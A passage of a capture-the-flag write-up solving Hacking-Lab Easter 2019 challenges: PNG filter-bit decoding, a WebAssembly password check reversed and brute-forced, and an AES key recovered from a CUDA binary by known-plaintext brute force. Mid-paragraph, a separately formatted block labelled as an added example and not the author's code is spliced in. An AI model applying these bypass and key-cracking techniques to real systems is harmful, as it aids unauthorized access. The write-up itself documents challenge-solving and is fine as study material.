paeth):\n      0 1 0 1 0 0 1 1 0 0 0 1 0 0 1 1 1 0 0 1 0 0 1 0 1\n      1 0 1 0 1 0 1 0 1 0 0 0 1 0 0 1 0 1 1 0 1 1 0 1 0\n      0 1 0 1 1 0 1 0 0 1 0 0 1 0 1 1 0 1 0 0 1 1 (364 out of 480)\n  chunk IDAT at offset 0x0c0f5, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 0 1 0 0 1 1 0 0 0 0 1 0 1 0 1 0 1 1 0 0 1 1 0 0\n      0 0 1 0 0 1 0 1 1 0 1 0 1 1 0 0 0 1 1 0 1 0 0 1 0\n      1 1 0 1 0 0 1 0 1 0 (424 out of 480)\n  chunk IDAT at offset 0x0e101, length 5022\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 1 0 1 1 1 1 0 0 1 0 1 1 0 1 0 0 1 1 1 0 0 1 0\n      1 0 1 0 0 0 1 0 1 0 0 0 0 1 1 0 1 1 0 1 0 1 0 0 0\n      0 0 0 0 0 0 (480 out of 480)\n  chunk IEND at offset 0x0f4ab, length 0\nNo errors detected in \/root\/Documents\/he19\/egg17\/eggdesign.png (15 chunks, 93.2% 
compression).\n<\/pre><\/div>\n<br\/>Filters! Finally! The only thing left to do is to convert the bit stream to ASCII:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; import binascii\n&gt;&gt;&gt; bitstream = int(&#039;010000110110111101101110011001110111001001100001011101000111010101101...&#039;, 2)\n&gt;&gt;&gt; binascii.unhexlify(&#039;%x&#039; % bitstream)\n&#039;Congratulation, here is your flag: he19-TKii-2aVa-cKJo-9QCj\\x00&#039;\n\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-TKii-2aVa-cKJo-9QCj<\/span>.\n<br\/>\n<h1 id=\"chlg18\">18 &#8211; Egg Storage<\/h1>\nThe challenge description provides a link to the following website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>The input field requires exactly 24 characters to be entered. 
When entering some garbage, a broken egg is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>By viewing the source code we can see that the JavaScript is using <a href=\"https:\/\/en.wikipedia.org\/wiki\/WebAssembly\" target=\"_new\" rel=\"noopener noreferrer\">WebAssembly<\/a>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n...\n\nfunction compileAndRun() {\n    WebAssembly.instantiate(content, {\n        base: {\n            functions: nope\n        }\n    }).then(module =&gt; callWasm(module.instance));\n}\n\ncompileAndRun();\n<\/pre><\/div>\n<br\/>\n<br\/>The JavaScript source code also contains a loop which executes the <code>debugger<\/code> statement 100 times:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nfunction nope() {\n    for (let i = 0; i &lt; 100; i++) {\n        debugger;\n    }\n\n    return 1337;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>This statement pauses execution if the developer tools are open. This means that we would have to click continue 100 times to get past this loop before we could debug the code after it. In order to bypass this, we can simply download the whole page and comment out the loop:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nfunction nope() {\n    \/*for (let i = 0; i &lt; 100; i++) {\n        debugger;\n    }*\/\n\n    return 1337;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>If we open the debugger in our browser (e.g. 
<code>Chrome<\/code>) and click on <code>Validate<\/code> now, we can see that there are three WebAssembly functions: <code>wasm-d986c06a-1<\/code>, <code>wasm-d986c06a-2<\/code> and <code>wasm-d986c06a-3<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_03.png\" width=\"900\"\/>\n<br\/>\n<br\/>We can now set a breakpoint within the WebAssembly code and single step through the code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_04.png\" width=\"900\"\/>\n<br\/>\n<br\/>Stepping through the code and inspecting the effect of each instruction helps to better understand what the code does.\n<br\/>\n<br\/>Basically WebAssembly is quite easy to read. The stack plays a very important role since operations are not carried out in registers but on the stack. If we want to add two values, we push both of them on the stack and call the add instruction. This instruction pops both values from the stack and pushes the result onto it. 
This is how every instruction works.\n<br\/>\n<br\/>Keeping this in mind, we can reverse the WebAssembly into the following pseudo code, written here as compilable C:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;string.h&gt;\n\n\/\/ input = 24 characters\n\nint validatePassword(const char *input) {\n  int i, x, y;\n\n  \/\/ characters 4..23 must come from a fixed alphabet\n  for (i = 4; i &lt; 24; i++) {\n    if (strchr(&quot;01345HLXcdfr&quot;, input&#x5B;i]) == NULL) return 0;\n  }\n\n  \/\/ fixed prefix\n  if (input&#x5B;0] != &#039;T&#039;) return 0;\n  if (input&#x5B;1] != &#039;h&#039;) return 0;\n  if (input&#x5B;2] != &#039;3&#039;) return 0;\n  if (input&#x5B;3] != &#039;P&#039;) return 0;\n\n  \/\/ characters that must be equal to each other\n  if (input&#x5B;23] != input&#x5B;17]) return 0;\n  if (input&#x5B;12] != input&#x5B;16]) return 0;\n  if (input&#x5B;22] != input&#x5B;15]) return 0;\n\n  \/\/ arithmetic relations between characters\n  if ((input&#x5B;5] - input&#x5B;7]) != 14) return 0;\n  if ((input&#x5B;14]+1) != input&#x5B;15]) return 0;\n  if ((input&#x5B;9]%input&#x5B;8]) != 40) return 0;\n  if ((input&#x5B;5]-input&#x5B;9]+input&#x5B;19]) != 79) return 0;\n  if ((input&#x5B;7]-input&#x5B;14]) != input&#x5B;20]) return 0;\n  if ((input&#x5B;9]%input&#x5B;4])*2 != input&#x5B;13]) return 0;\n  if ((input&#x5B;13]%input&#x5B;6]) != 20) return 0;\n  if ((input&#x5B;11]%input&#x5B;13]) != (input&#x5B;21]-46)) return 0;\n  if ((input&#x5B;7]%input&#x5B;6]) != input&#x5B;10]) return 0;\n  if ((input&#x5B;23]%input&#x5B;22]) != 2) return 0;\n\n  \/\/ byte sum and XOR over characters 4..23\n  x = 0;\n  y = 0;\n  for (i = 4; i &lt; 24; i++) {\n    x += input&#x5B;i];\n    y ^= input&#x5B;i];\n  }\n\n  if (x != 1352) return 0;\n  if (y != 44) return 0;\n\n  return 1;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>As it turned out, several checks are made on the characters of the given input. Obviously the password is supposed to start with <code>Th3P<\/code>. 
All following characters are supposed to be one of the following: <code>0<\/code>, <code>1<\/code>, <code>3<\/code>, <code>4<\/code>, <code>5<\/code>, <code>H<\/code>, <code>L<\/code>, <code>X<\/code>, <code>c<\/code>, <code>d<\/code>, <code>f<\/code>, <code>r<\/code>. This greatly reduces the possible password space. Though, the other requirements are not so easy to grasp. In order to find the valid password, we can write a python script, which bruteforces it:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nalpha = &#039;01345HLXcdfr&#039;\npwd   = &#039;Th3P&#039;\n\nfor c4 in &#039;01345HLXcdfr&#039;:\n  for c5 in alpha:\n    for c6 in alpha:\n      for c7 in alpha:\n        if (ord(c5) - ord(c7) != 14): continue\n        for c8 in alpha:\n          for c9 in alpha:\n            if (ord(c9)%ord(c8) != 40): continue\n            for c10 in alpha:\n              if (ord(c7)%ord(c6) != ord(c10)): continue\n              for c11 in alpha:\n                for c12 in alpha:\n                  for c13 in alpha:\n                    if (ord(c13)%ord(c6) != 20): continue\n                    if ((ord(c9)%ord(c4))*2 != ord(c13)): continue\n                    for c14 in alpha:\n                      for c15 in alpha:\n                        if ((ord(c14)+1) != ord(c15)): continue\n                        c16 = c12\n                        for c17 in alpha:\n                          for c18 in alpha:\n                            for c19 in alpha:\n                              if (ord(c5)-ord(c9)+ord(c19) != 79): continue\n                              for c20 in alpha:\n                                if (ord(c7)-ord(c14) != ord(c20)): continue\n                                for c21 in alpha:\n                                  if (ord(c11)%ord(c13) != ord(c21)-46): continue\n                                  c22 = c15\n                                  c23 = c17\n       
                           if (ord(c23)%ord(c22) != 2): continue\n                                  x = 0\n                                  y = 0\n                                  p = pwd+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16+c17+c18+c19+c20+c21+c22+c23\n                                  for i in range(4, 24):\n                                    x += ord(p&#x5B;i])\n                                    y ^= ord(p&#x5B;i])\n                                  if (x != 1352): continue\n                                  if (y != 44): continue\n                                  print(p)\n<\/pre><\/div>\n<br\/>\n<br\/>Running the script almost instantly outputs the password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg18# .\/bruteforce.py\nTh3P4r4d0X0fcH01c3154L13\n<\/pre><\/div>\n<br\/>\n<br\/>Entering the password <code>Th3P4r4d0X0fcH01c3154L13<\/code> into the input field yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_05.png\" width=\"700\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-DJXj-nL5q-BrfK-7z1x<\/span>.\n<br\/>\n<h1 id=\"chlg19\">19 &#8211; CoUmpact DiAsc<\/h1>\nThe challenge provides a binary called <code>coumpactdiasc<\/code>. 
In order to run this binary properly, <a href=\"https:\/\/developer.nvidia.com\/cuda-downloads\" target=\"_new\" rel=\"noopener noreferrer\">Nvidia CUDA<\/a> is required.\n<br\/>\n<br\/>After having set up CUDA, we can run the program, which prompts for a password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: test\n<\/pre><\/div>\n<br\/>The program creates a file called <code>egg<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ file egg\negg: data\n<\/pre><\/div>\n<br\/>Its content seems to be garbage:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ hexdump -C egg | head\n00000000  0a 14 d4 ab 8a 26 5f df  eb b7 56 f1 ee 9c 75 7c  |.....&amp;_...V...u||\n00000010  c6 be 8a 20 8b 9b 5f a4  4e ef bf 11 6d c3 60 ee  |... 
.._.N...m.`.|\n00000020  8e 59 bc bb f4 b0 7a d6  7b 04 6b 08 38 32 46 2f  |.Y....z.{.k.82F\/|\n00000030  11 ad af 94 3e 21 f9 01  69 82 09 0b 1d 0e ed 41  |....&gt;!..i......A|\n00000040  f0 86 60 1b 04 2c 60 59  8e 05 b5 d1 ca 2c 40 f3  |..`..,`Y.....,@.|\n00000050  0f 68 b0 c7 2f 29 39 38  6d 20 07 38 56 9b 72 74  |.h..\/)98m .8V.rt|\n00000060  3d c1 19 63 43 2a 26 da  84 be d3 16 01 74 df 66  |=..cC*&amp;......t.f|\n00000070  fd 5a b2 80 48 10 12 0d  ab 53 43 df 05 bb e8 a7  |.Z..H....SC.....|\n00000080  f9 1d a9 32 60 f6 8d 07  68 c1 f0 dc 2e 02 51 aa  |...2`...h.....Q.|\n00000090  fe e8 82 df 07 9c 7b 3f  82 6e 2a 31 c9 1f b1 be  |......{?.n*1....|\n<\/pre><\/div>\n<br\/>The description of the challenge also contains a hint for the password (we will get back to this later):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>I started by analyzing the binary in <code>ghidra<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_02.png\" width=\"1200\"\/>\n<br\/>\n<br\/>This part of the program does not do very much. It simply reads a password of up to <code>0x11<\/code> bytes from <code>stdin<\/code>, initializes a few CUDA buffers and runs three different CUDA functions (<code>f13<\/code>, <code>f3<\/code> and <code>f12<\/code>). 
Finally, one of the CUDA buffers is written to the file <code>egg<\/code>.\n<br\/>\n<br\/>In order to determine what these CUDA functions do, I disassembled them using <code>cuobjdump<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ \/usr\/local\/cuda-10.1\/bin\/cuobjdump coumpactdiasc -sass\n\nFatbin elf code:\n================\narch = sm_30\ncode version = &#x5B;1,7]\nproducer = &lt;unknown&gt;\nhost = linux\ncompile_size = 64bit\n\n\tcode for sm_30\n\nFatbin elf code:\n================\narch = sm_30\ncode version = &#x5B;1,7]\nproducer = cuda\nhost = linux\ncompile_size = 64bit\n\n\tcode for sm_30\n\t\tFunction : _Z3f13PhS_PjS_i\n\t.headerflags    @&quot;EF_CUDA_SM30 EF_CUDA_PTX_SM(EF_CUDA_SM30)&quot;\n                                                                     \/* 0x22f2c28232423307 *\/\n        \/*0008*\/                   MOV R1, c&#x5B;0x0]&#x5B;0x44];             \/* 0x2800400110005de4 *\/\n        \/*0010*\/                   S2R R0, SR_CTAID.X;               \/* 0x2c00000094001c04 *\/\n        \/*0018*\/                   S2R R2, SR_TID.X;                 \/* 0x2c00000084009c04 *\/\n        \/*0020*\/                   IMUL R0, R0, c&#x5B;0x0]&#x5B;0x28];        \/* 0x50004000a0001ca3 *\/\n        \/*0028*\/                   IADD R3, -R2, RZ;                 \/* 0x48000000fc20de03 *\/\n        \/*0030*\/                   ISETP.NE.AND P0, PT, R0, R3, PT;  \/* 0x1a8e00000c01dc23 *\/\n        \/*0038*\/               @P0 EXIT;                             \/* 0x80000000000001e7 *\/\n                                                                     \/* 0x2232304230428047 *\/\n        \/*0048*\/                   MOV R2, c&#x5B;0x0]&#x5B;0x150];            \/* 0x2800400540009de4 *\/\n        \/*0050*\/                   MOV R3, c&#x5B;0x0]&#x5B;0x154];            \/* 0x280040055000dde4 *\/\n        \/*0058*\/           
        LD.E R0, &#x5B;R2];                    \/* 0x8400000000201c85 *\/\n        \/*0060*\/                   MOV R16, c&#x5B;0x0]&#x5B;0x158];           \/* 0x2800400560041de4 *\/\n        \/*0068*\/                   LD.E R5, &#x5B;R2+0x4];                \/* 0x8400000010215c85 *\/\n        \/*0070*\/                   MOV R17, c&#x5B;0x0]&#x5B;0x15c];           \/* 0x2800400570045de4 *\/\n        \/*0078*\/                   LD.E R6, &#x5B;R2+0x8];                \/* 0x8400000020219c85 *\/\n                                                                     \/* 0x2232323232323047 *\/\n        \/*0088*\/                   LD.E R7, &#x5B;R2+0xc];                \/* 0x840000003021dc85 *\/\n        \/*0090*\/                   MOV R15, c&#x5B;0x0]&#x5B;0x14c];           \/* 0x280040053003dde4 *\/\n        \/*0098*\/                   LD.E R10, &#x5B;R2+0x18];              \/* 0x8400000060229c85 *\/\n        \/*00a0*\/                   LD.E R11, &#x5B;R2+0x1c];              \/* 0x840000007022dc85 *\/\n        \/*00a8*\/                   LD.E R12, &#x5B;R2+0x20];              \/* 0x8400000080231c85 *\/\n        \/*00b0*\/                   LD.E R13, &#x5B;R2+0x24];              \/* 0x8400000090235c85 *\/\n        \/*00b8*\/                   LD.E R8, &#x5B;R2+0x10];               \/* 0x8400000040221c85 *\/\n                                                                     \/* 0x22b04230427043f7 *\/\n        \/*00c8*\/                   LD.E R9, &#x5B;R2+0x14];               \/* 0x8400000050225c85 *\/\n        \/*00d0*\/                   LOP32I.XOR R4, R0, 0xdeadbeef;    \/* 0x3b7ab6fbbc011c82 *\/\n        \/*00d8*\/                   MOV32I R0, 0xffffff00;            \/* 0x1bfffffc00001de2 *\/\n        \/*00e0*\/                   LOP32I.XOR R5, R5, 0xdeadbeef;    \/* 0x3b7ab6fbbc515c82 *\/\n        \/*00e8*\/                   LOP32I.XOR R6, R6, 0xdeadbeef;    \/* 0x3b7ab6fbbc619c82 *\/\n        \/*00f0*\/                   ST.E &#x5B;R2], R4;                
    \/* 0x9400000000211c85 *\/\n        \/*00f8*\/                   LOP32I.XOR R7, R7, 0xdeadbeef;    \/* 0x3b7ab6fbbc71dc82 *\/\n                                                                     \/* 0x2272304230423047 *\/\n        \/*0108*\/                   LOP32I.XOR R11, R11, 0xdeadbeef;  \/* 0x3b7ab6fbbcb2dc82 *\/\n        \/*0110*\/                   LOP32I.XOR R12, R12, 0xdeadbeef;  \/* 0x3b7ab6fbbcc31c82 *\/\n        \/*0118*\/                   LOP32I.XOR R4, R10, 0xdeadbeef;   \/* 0x3b7ab6fbbca11c82 *\/\n        \/*0120*\/                   LOP32I.XOR R13, R13, 0xdeadbeef;  \/* 0x3b7ab6fbbcd35c82 *\/\n        \/*0128*\/                   ST.E &#x5B;R2+0x4], R5;                \/* 0x9400000010215c85 *\/\n        \/*0130*\/                   LOP32I.XOR R14, R8, 0xdeadbeef;   \/* 0x3b7ab6fbbc839c82 *\/\n        \/*0138*\/                   LOP32I.XOR R9, R9, 0xdeadbeef;    \/* 0x3b7ab6fbbc925c82 *\/\n...\n<\/pre><\/div>\n<br\/>What followed was a lot of assembly. Nevertheless, I started to reverse every function step by step. Suddenly, I recognized a few similarities to the AES white-box from <a href=\"#chlg14\">egg14<\/a>. 
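Before following that hunch through the rest of the SASS, it helps to have a small AES-128 reference at hand. The following is an added example and not the author's code: it implements AES-128 block encryption in pure Python (so no pycryptodome is needed) and uses it for the known-plaintext key search that this challenge boils down to, i.e. a candidate key is accepted when encrypting the expected PNG header with it reproduces the first 16 bytes of the buffer <code>v10</code> shown below. The PNG header and the ciphertext block are the values from this writeup; everything else (function names, the reduced search) is this example's own. Because pure Python manages only a few thousand keys per second, the demo searches a 3-byte unknown prefix in front of <code>CRACKWITHCUDA</code> instead of the 8 unknown bytes of the real search.

```python
#!/usr/bin/env python3
"""Known-plaintext AES-128 key search in pure Python (added example).

A candidate key is accepted when AES-encrypting the expected plaintext block
(the PNG header) with it reproduces the stored ciphertext block.  This is the
check aes-brute-force performs and it is equivalent to the program's
decryption of v10 yielding a PNG header.  Pure Python is far too slow for the
real 26**8 search, so the demo only searches a 3-byte unknown prefix.
"""
import itertools


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return r


def _sbox_entry(x):
    """S-box: multiplicative inverse (x**254, 0 maps to 0) then the affine transform."""
    inv, base, e = 1, x, 254
    while e:
        if e & 1:
            inv = gf_mul(inv, base)
        base = gf_mul(base, base)
        e >>= 1
    out = inv
    for s in range(1, 5):                         # inv ^ rotl(inv,1..4) ^ 0x63
        out ^= ((inv << s) | (inv >> (8 - s))) & 0xFF
    return out ^ 0x63


SBOX = [_sbox_entry(x) for x in range(256)]
MUL2 = [gf_mul(x, 2) for x in range(256)]        # MixColumns lookup tables
MUL3 = [gf_mul(x, 3) for x in range(256)]
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key):
    """AES-128 key schedule: 16-byte key -> 11 round keys of 16 bytes each."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord + SubWord
            t[0] ^= RCON[i // 4 - 1]
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def aes128_encrypt_block(key, block):
    """Encrypt one 16-byte block; the state is column-major like the input bytes."""
    rk = expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[((c + r) % 4) * 4 + r] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd != 10:                                                       # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [MUL2[a0] ^ MUL3[a1] ^ a2 ^ a3, a0 ^ MUL2[a1] ^ MUL3[a2] ^ a3,
                      a0 ^ a1 ^ MUL2[a2] ^ MUL3[a3], MUL3[a0] ^ a1 ^ a2 ^ MUL2[a3]]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]                             # AddRoundKey
    return bytes(s)


# Values from the writeup: PNG signature + IHDR chunk length + "IHDR", and the
# first 16 bytes of the embedded buffer v10.
PNG_HEADER = bytes.fromhex("89504E470D0A1A0A0000000D49484452")
V10_BLOCK0 = bytes.fromhex("7131AD54EF04DBA503300C0FF7BD838E")


def recover_key(cipher_block, plain_block, known_suffix, charset, n_unknown):
    """Try every len(charset)**n_unknown prefix in front of known_suffix and return
    the first key whose encryption of plain_block equals cipher_block, else None."""
    if len(known_suffix) + n_unknown != 16:
        raise ValueError("prefix plus known suffix must form a 16-byte AES-128 key")
    for prefix in itertools.product(charset, repeat=n_unknown):
        key = bytes(prefix) + known_suffix
        if aes128_encrypt_block(key, plain_block) == cipher_block:
            return key
    return None


if __name__ == "__main__":
    # Self-check against the FIPS-197 Appendix C.1 test vector.
    assert aes128_encrypt_block(bytes(range(16)), bytes.fromhex("00112233445566778899aabbccddeeff")) \
        == bytes.fromhex("69c4e0d86a7b0430d8cdb78070b4c55a")
    # Reduced search: three unknown uppercase letters in front of "CRACKWITHCUDA".
    print(recover_key(V10_BLOCK0, PNG_HEADER, b"CRACKWITHCUDA", b"ABCDEFGHIJKLMNOPQRSTUVWXYZ", 3))
```

The search only needs the first ciphertext block and no decryption routine at all: encrypting the known plaintext and comparing is the same test as decrypting and comparing with the PNG header, and the per-key cost is one key schedule plus one block, which is exactly what makes a native or CUDA implementation worthwhile for the full 26^8 space.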
Could this possibly be AES?\n<br\/>\n<br\/>The buffer which seems to be decrypted and written to the file <code>egg<\/code> is called <code>v10<\/code> (dumped here with radare2):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00403760]&gt; pc @ obj.v10\n#define _BUFFER_SIZE 256\nconst uint8_t buffer&#x5B;256] = {\n  0x71, 0x31, 0xad, 0x54, 0xef, 0x04, 0xdb, 0xa5, 0x03, 0x30,\n  0x0c, 0x0f, 0xf7, 0xbd, 0x83, 0x8e, 0xb1, 0xcd, 0x89, 0xc5,\n  0x6f, 0x8a, 0x0e, 0x6b, 0xb3, 0x18, 0xc1, 0xd5, 0xc6, 0x5c,\n  0x44, 0x1a, 0xa2, 0x80, 0xb7, 0xc1, 0xe1, 0x9a, 0x6f, 0xba,\n  0x4f, 0x11, 0x03, 0xb8, 0x1e, 0xbc, 0x8d, 0xe3, 0xf2, 0x99,\n...\n<\/pre><\/div>\n<br\/>So let&#8217;s try to decrypt the first 16-byte block of this buffer with AES in ECB mode and an arbitrary key of our choosing:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg19# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; key = &#039;testtesttesttest&#039;\n&gt;&gt;&gt; cipher = AES.new(key, AES.MODE_ECB)\n&gt;&gt;&gt; v10 = &#039;\\x71\\x31\\xad\\x54\\xef\\x04\\xdb\\xa5\\x03\\x30\\x0c\\x0f\\xf7\\xbd\\x83\\x8e&#039;\n&gt;&gt;&gt; cipher.decrypt(v10).encode(&#039;hex&#039;)\n&#039;24d2b45ee0fa357d13508450b634e5d5&#039;\n<\/pre><\/div>\n<br\/>And now let&#8217;s use the same key for the program:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: testtesttesttest\n<\/pre><\/div>\n<br\/>And compare the result stored in the file <code>egg<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; 
gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ hexdump -C egg | head -n 1\n00000000  24 d2 b4 5e e0 fa 35 7d  13 50 84 50 b6 34 e5 d5  |$..^..5}.P.P.4..|\n<\/pre><\/div>\n<br\/>The output is the same. The program simply AES-decrypts the embedded buffer with the given password as the key (the first block of the output is exactly the ECB decryption of the first block of <code>v10<\/code>). This means that we can use any tool featuring AES in order to find the valid key: a candidate key is correct if decrypting the first block with it yields the expected plaintext or, equivalently, if encrypting the expected plaintext with it yields the first block of <code>v10<\/code>.\n<br\/>\n<br\/>On the password hint image we can see that the last letters of the password are <code>THCUDA<\/code>. Taking into account English words which end with the letters <code>TH<\/code>, it seems probable that the password ends with <code>WITHCUDA<\/code>.\n<br\/>\n<br\/>Since the key should be 16 bytes long, there are 8 bytes left to brute-force: <code>xxxxxxxxWITHCUDA<\/code>.\n<br\/>\n<br\/>Also we can assume that the resulting file called <code>egg<\/code> should probably be a PNG image. This makes the first 16 bytes of the plain text the PNG signature followed by the length and type of the <code>IHDR<\/code> chunk: <code>89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52<\/code>.\n<br\/>\n<br\/>Taking all this into account we can use this very good AES brute-forcing tool: <a href=\"https:\/\/github.com\/sebastien-riou\/aes-brute-force\" target=\"_new\" rel=\"noopener noreferrer\">aes-brute-force<\/a>.\n<br\/>\n<br\/>We have to provide:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>a key mask (we only want to brute-force the first 8 bytes: <code>FFFFFFFF_FFFFFFFF_00000000_00000000<\/code>)<\/li><li>the parts of the key we know (<code>...WITHCUDA<\/code>: <code>00000000_00000000_57495448_43554441<\/code>)<\/li><li>the plain text we expect (<code>89504E47_0D0A1A0A_0000000D_49484452<\/code>)<\/li><li>the cipher text to be used (<code>7131AD54_EF04DBA5_03300C0F_F7BD838E<\/code>)<\/li><li>the charset for the key (since the known part of the key only contains uppercase letters, the ASCII range <code>65 - 90<\/code>)<\/li><\/ul>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" 
title=\"\">\nuser@h0st:\/opt\/aes-brute-force$ .\/aes-brute-force FFFFFFFF_FFFFFFFF_00000000_00000000 00000000_00000000_57495448_43554441 89504E47_0D0A1A0A_0000000D_49484452 7131AD54_EF04DBA5_03300C0F_F7BD838E 65 90\nINFO: 12 concurrent threads supported in hardware.\n\nSearch parameters:\n\tn_threads:    12\n\tkey_mask:     FFFFFFFF_FFFFFFFF_00000000_00000000\n\tkey_in:       00000000_00000000_57495448_43554441\n\tplain:        89504E47_0D0A1A0A_0000000D_49484452\n\tcipher:       7131AD54_EF04DBA5_03300C0F_F7BD838E\n\tbyte_min:     0x41\n\tbyte_max:     0x5A\n\n\tjobs_key_mask:00FFFFFF_FFFFFFFF_00000000_00000000\n\nLaunching 64 bits search\n\nThread 0 claims to have found the key\n\tkey found:    41455343_5241434B_57495448_43554441\n\nPerformances:\n\t91463133065 AES128 operations done in 942.856s\n\t10ns per AES128 operation\n\t97.01 million keys per second\n<\/pre><\/div>\n<br\/>The tool successfully brute-forced the key after about 16 minutes, having tried roughly 44% of the 26^8 (about 2.1e11) possible keys; the complete key space would have taken roughly 36 minutes at 97 million keys per second, so the search is well within reach of a desktop CPU. The key is <code>41455343_5241434B_57495448_43554441<\/code>. Converting this to ASCII:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; &#039;41455343_5241434B_57495448_43554441&#039;.replace(&#039;_&#039;,&#039;&#039;).decode(&#039;hex&#039;)\n&#039;AESCRACKWITHCUDA&#039;\n<\/pre><\/div>\n<br\/>&#8230; reveals that the key is <code>AESCRACKWITHCUDA<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: AESCRACKWITHCUDA\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ file 